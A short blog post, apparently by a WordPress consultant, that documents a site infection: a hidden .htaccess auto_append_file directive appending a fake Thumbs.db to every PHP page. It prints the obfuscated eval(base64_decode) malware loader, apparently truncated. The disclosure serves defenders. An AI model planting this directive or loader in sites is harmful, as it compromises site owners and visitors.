New Type Of Hack

I’ve been working with a client on a performance tuning project, and it looks like this was in fact a hack that is slowing down the site, this is the first time I have seen this hack technique so I thought I would document it for the wider WordPress community.

The hack is in two parts, the first is a php directive in .htaccess the second is a base64 encoded file which holds the payload.

.htaccess

The hacker has added hundreds of white spaces at the bottom of the .htaccess and then buried a directive in there so a casual look at .htaccess won’t show the code up.  At the bottom of the file I found:

php_value auto_append_file /var/www/html/{SITEDETALSREMOVED}/wp/Thumbs.db

This directive tells the webserver to append the file Thumbs.db to all php pages it loads up.  This means that a little piece of code is added to each web page served up.

Thumbs.db

Thumbs.db is normally a thumbnail file often included on windows servers, I have uploaded this by accident a number of times, so it looks like an un-needed but safe file. in the case of this site, it has a base64 encoded payload of malware.

@eval(base64_decode("aWYgKCRldmFsYnNmcm1iR3ZaWERGICE9IDU1NjkzKSB7ZnVuY3Rpb24gZXZhbHFLcVFJWmpRbXZIKCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0xOyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI9c1RLd2d5WnVsR2R5OUdjbEozWHk5bWN5VkdRIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI9QVNmN2tTVFVOSFpDVm1hR3hrVGl4MlFzRm1kbFJDS2xSMmJqVkdaZlJqTmxOWFlpQmlieVZIZGxKM2Vna1NUVU5IWkNWbWFHeGtUaXgyUXNGbWRsUkNLMWxYU2xOWFRCbFdTS05GYmhaWFpnNDJicFIzWXVWbloiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIjdraUk5VWtNWkpDSzFsWFNsTlhUQmxXU0tORmJoWlhaZzBESTNaWFVCWm5VSlYwZDBoMmNNeG1RbXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIjdraUk5MEVTa2htVXpNbUlvVVhlSlYyY05GVWFKcDBVc0ZtZGwxelREZG5ZR2hIWjFkR1ZDVkhSaXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIj09d09wSVNQOUUwWXdJRlNoSkNLMWxYU2xOWFRCbFdTS05GYmhaWFo5NFVaVkZXUjFwbFpPVjBZTXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIj1zVEtpMEROWEZtSW9VWGVKVjJjTkZVYUpwMFVzRm1kbDFqVjVkMFkwcDNTalowUUgxR1VXeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbHFLcVFJWmpRbXZIKCc7KSkiPXNUS2kwVFBSbGtka2RWU2lnU2Q1bFVaejFVUXBsa1NUeFdZMlZXUGh4a1p4ZDJaaEJGYTZkSFZ3UkdTUHhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIj09d09kbGlJVlZUVlNoa1J3ZzFVV0JUVldsalJWVmxVR05sSW9VWGVKVjJjTkZVYUpwMFVzRm1kbHRsVUZabFVGTjFYazBUZFlwM1lKVlVlUWRWUUZ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI3a1NLaTBUUG5OR2I0MVdXMFpVYlZKQ0sxbFhTbE5YVEJsV1NLTkZiaFpYWmd3U0tpUWpWSHBWZEdkMVZpZ1NkNWxVWnoxVVFwbGtTVHhXWTJWR0lza2lJOWtFV2FKRGJIRm1hS2hWV21aMFZoSkNLMWxYU2xOWFRCbFdTS05GYmhaWFpnd1NLaUFUT3RGMVRPWkZWaWdTZDVsVVp6MVVRcGxrU1R4V1kyVkdJc2tpSTlFa2JqRkRleVVsSW9VWGVKVjJjTkZVYUpwMFVzRm1kbEJDTHBJQ2I0SmpXMmxqTVNKQ0sxbFhTbE5YVEJsV1NLTkZiaFpYWm9rWFl5SlhZZzBESXlwMmRJeFVheWwwVkNwMFN0eFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbHFLcVFJWmpRbXZIKCc7KSkiN2NuZFJGa2RTbFVSM1JIYXp4RWJDWkdiaFpYWmswakxXOTBRdFptVVRWa1JoWkVhSU5VWXNwSGJoWlhaa0FTS2dzeUtwUkNJN2tESTl3RElwUkNJN0FESTlBU2FrZ0NJeTltWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbHFLcVFJWmpRbXZIKCc7KSkiN2tTS2kwVFBSWjJOcmwzWXJkV2VqQlROWHBGTTFJallxbGpSa3hHWnlnRmI0ZFZZdEpVUkpWblNZUkdNVzEyWTNJMFVMcG5VRHQwVFdoMVlWQkhNWmhtUkdkbFJzQmpZUmx6UmlobVdZcDFaMElqWXdKMU1aVm5WdXBsSW9VWGVKVjJjTkZVYUpwMFVzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIjdjbmRSRmtkU2xVUjNSSGF6eEViQ1pHYmhaWFprNGlJdUlTUHVBaVZQTlVibUoxVUZaVVlHaEdTREZHYjZ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI9PVFmOXRqYVh4MGNRSjBTNXhXVHNGbWRsUkNJdmgyWWx0VFh4c2xhWHgwY1FKMFM1eFdUc0ZtZGxSQ0k5QWlhWHgwY1FKMFM1eFdUc0ZtZGxSQ0k3a2lhWHgwY1FKMFM1eFdUc0ZtZGxSQ0xoeGtaeGQyWmhCRmE2ZEhWd1JHU1B4V1kyVkdKb1VHWnZ4R2M0VkdJOUFpYVh4MGNRSjBTNXhXVHNGbWRsUnllcGtTWU1aV2NuZFdZUWhtZTNSRmNraDBUc0ZtZGxSQ0xxZEZUekJsUUxsSGJOeFdZMlZHSm9JSGR6SkhkemhDSW1sMk9wa1NYcElTVk9GRFZKbGpSVlZsVUdObElvVVhlSlYyY05GVWFKcDBVc0ZtZGx0bFVGWmxVRk4xWGtnU1prOTJZdVZHYnlWbkxwSVNPbjFtU2lnU2Q1bFVaejFVUXBsa1NUeFdZMlZtTHBVSFc2TldTRmxIVVhGVVJzRm1kbFJDS2xSMmJqNVdac0pYZHVraUk1a1ViS0pDSzFsWFNsTlhUQmxXU0tORmJoWlhadTBWS2kwVFNHSlZSR0JEV0dKVk1VNWtWclZsSW9VWGVKVjJjTkZVYUpwMFVzRm1kbHRsVUZabFVGTjFYazRTS2kwRE1VRm1Jb1VYZUpWMmNORlVhSnAwVXNGbWRsNVNLaTBET0VObUlvVVhlSlYyY05GVWFKcDBVc0ZtZGw1U0tpOG1RdXhrSW9VWGVKVjJjTkZVYUpwMFVzRm1kbDVpVjVkMFkwcDNTalowUUgxR1VXeFdZMlZHSnVraUk5MHpkTUpDSzFsWFNsTlhUQmxXU0tORmJoWlhadVkxVEQxbVpTTlZSR0ZtUm9oMFFoeG1lc0ZtZGxSaUxwSVNQNGtIVGlnU2Q1bFVaejFVUXBsa1NUeFdZMlZtTHBJU1A5YzJUaWdTZDVsVVp6MVVRcGxrU1R4V1kyVm1MT1ZXVmhWVWRhWm1URk5HVHNGbWRsUkNLT1ZYY1VwMFloRkZXRmwwYlE5R2JoWlhaZzBESXFkRlR6QmxRTGxIYk54V1kyVkdKZ3NUS3dBRE93RXpLcGdTWnRsR2Rza1NLaTBUVElSR2FTTnpZaWdTZDVsVVp6MVVRcGxrU1R4V1kyVkdLMVFXYnM4MFEzSm1SNFJXZG5SbFExUmtZc0ZtZGxSQ0tsbDJhdjkyWTBWMmNBQnllZ1UyY3NWR0k5dEhJcGtTS2Q5MFEzSm1SNFJXZG5SbFExUmtZc0ZtZGxSeVdGbDBTUDkwUWZSQ0swVjJjemxHS2dJM2Jna1NLMWhsZWpsVVI1QjFWQlZFYmhaWFprQUNMaWsyTGlBaUxna2ljcWRIU01sbWNKZGxRS3RVYnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGTRUNCATED=")); ?>

So this malware was being loaded onto each page as an additional footer.

Check Your Site Now

If you are seeing a performance hit, please check your .htaccess for this hack.